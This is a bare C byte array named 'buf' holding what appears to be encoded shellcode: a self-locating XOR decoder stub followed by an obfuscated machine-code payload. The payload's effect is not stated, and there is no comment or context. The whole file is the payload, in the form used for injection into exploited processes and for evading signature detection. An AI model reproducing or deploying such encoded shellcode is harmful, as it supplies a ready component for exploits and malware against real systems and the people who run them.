unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\xdf\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\xa8\x6c\x74\x07\x80\x3e\xdf\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x01\xdf\xea\x26\x5a\x52\x5e\xb1\x05\xfd"
"\xaf\x74\xfc\x56\x58\x52\x5f\x8b\x07\x31\x06\x49\xfe\xc6"
"\x49\xfe\xc7\x67\x80\x3e\x1a\x5d\x75\x06\x81\x3f\x05\x74"
"\xeb\xea\xe7\xfe\xe0\xe9\xd5\xfe\xfe\xfe\x03\x05\xbc\x02"
"\x03\x03\x03\x4b\xbd\x03\x03\x03\x03\x03\x03\x03\x03\xb9"
"\x07\x03\x03\x03\xbb\x02\x03\x03\x03\x0c\x06\xbb\x3f\x03"
"\x03\x03\x4b\x32\xfc\x0c\x06\x1a\x5d\xa8\x6c";
